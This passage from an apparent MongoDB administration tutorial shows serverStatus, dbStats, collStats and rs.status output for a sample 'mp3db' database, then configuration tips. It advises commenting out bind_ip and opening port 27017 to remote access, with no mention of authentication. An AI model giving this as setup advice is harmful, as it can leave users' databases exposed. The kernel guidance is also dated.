"open" : {
"noTimeout" : NumberLong(2),
"pinned" : NumberLong(0),
"total" : NumberLong(0)
}
},
"document" : {
"deleted" : NumberLong(72),
"inserted" : NumberLong(112),
"returned" : NumberLong(1294),
"updated" : NumberLong(0)
},
"getLastError" : {
"wtime" : {
"num" : 0,
"totalMillis" : 0
},
"wtimeouts" : NumberLong(0)
},
"operation" : {
"fastmod" : NumberLong(0),
"idhack" : NumberLong(0),
"scanAndOrder" : NumberLong(0)
},
"queryExecutor" : {
"scanned" : NumberLong(106),
"scannedObjects" : NumberLong(106)
},
"record" : {
"moves" : NumberLong(0)
},
"repl" : {
"apply" : {
"batches" : {
"num" : 0,
"totalMillis" : 0
},
"ops" : NumberLong(0)
},
"buffer" : {
"count" : NumberLong(0),
"maxSizeBytes" : 268435456,
"sizeBytes" : NumberLong(0)
},
"network" : {
"bytes" : NumberLong(0),
"getmores" : {
"num" : 0,
"totalMillis" : 0
},
"ops" : NumberLong(0),
"readersCreated" : NumberLong(0)
},
"preload" : {
"docs" : {
"num" : 0,
"totalMillis" : 0
},
"indexes" : {
"num" : 0,
"totalMillis" : 0
}
}
},
"storage" : {
"freelist" : {
"search" : {
"bucketExhausted" : NumberLong(0),
"requests" : NumberLong(97),
"scanned" : NumberLong(166)
}
}
},
"ttl" : {
"deletedDocuments" : NumberLong(0),
"passes" : NumberLong(18840)
}
},
"ok" : 1
}
>

dbStats - The dbStats command, or db.stats() from the shell, returns a document that addresses storage use and data volumes. The dbStats reflect the amount of storage used, the quantity of data contained in the database, and object, collection, and index counters.
> use mp3db
switched to db mp3db
> db.stats()
{
"db" : "mp3db",
"collections" : 4,
"objects" : 14,
"avgObjSize" : 42210.28571428572,
"dataSize" : 590944,
"storageSize" : 35037184,
"numExtents" : 7,
"indexes" : 4,
"indexSize" : 32704,
"fileSize" : 67108864,
"nsSizeMB" : 16,
"dataFileVersion" : {
"major" : 4,
"minor" : 5
},
"extentFreeList" : {
"num" : 0,
"totalSize" : 0
},
"ok" : 1
}
>

collStats - The collStats provides statistics that resemble dbStats on the collection level, including a count of the objects in the collection, the size of the collection, the amount of disk space used by the collection, and information about its indexes.
> db.mp3.chunks.stats()
{
"ns" : "mp3db.mp3.chunks",
"count" : 2,
"size" : 589792,
"avgObjSize" : 294896,
"storageSize" : 35012608,
"numExtents" : 4,
"nindexes" : 2,
"lastExtentSize" : 15290368,
"paddingFactor" : 1,
"systemFlags" : 1,
"userFlags" : 1,
"totalIndexSize" : 16352,
"indexSizes" : {
"_id_" : 8176,
"files_id_1_n_1" : 8176
},
"ok" : 1
}
>

replSetGetStatus - The replSetGetStatus command (rs.status() from the shell) returns an overview of your replica set’s status. The replSetGetStatus document details the state and configuration of the replica set and statistics about its members.
> rs.status()
{ "ok" : 0, "errmsg" : "not running with --replSet" }

log available in /var/log/mongodb/mongod.log

configuration

There are too many configurations to covered here but below are the essential configurations which you might need to change.

As mentioned previously, if the app that connected to the database are on two different servers, then in the server that run mongo instance, you should comment out bind_ip
# Listen to local interface only. Comment out to listen on all interfaces.
#bind_ip = 127.0.0.1

Default port running is 27017 but you should make sure that this port and ip allow to be access remotely.

use kernel 2.6.36 or later.

In general, if you use the Ext4 file system, use at least version 2.6.23 of the Linux Kernel.

In general, if you use the XFS file system, use at least version 2.6.25 of the Linux Kernel.

Set the file descriptor limit, -n, and the user process limit (ulimit), -u, above 20,000, according to the suggestions in the ulimit document. A low ulimit will affect MongoDB when under heavy use and can produce errors and lead to failed connections to MongoDB processes and loss of service.

That's it. Please go to the donate page and contribute back if you learned something.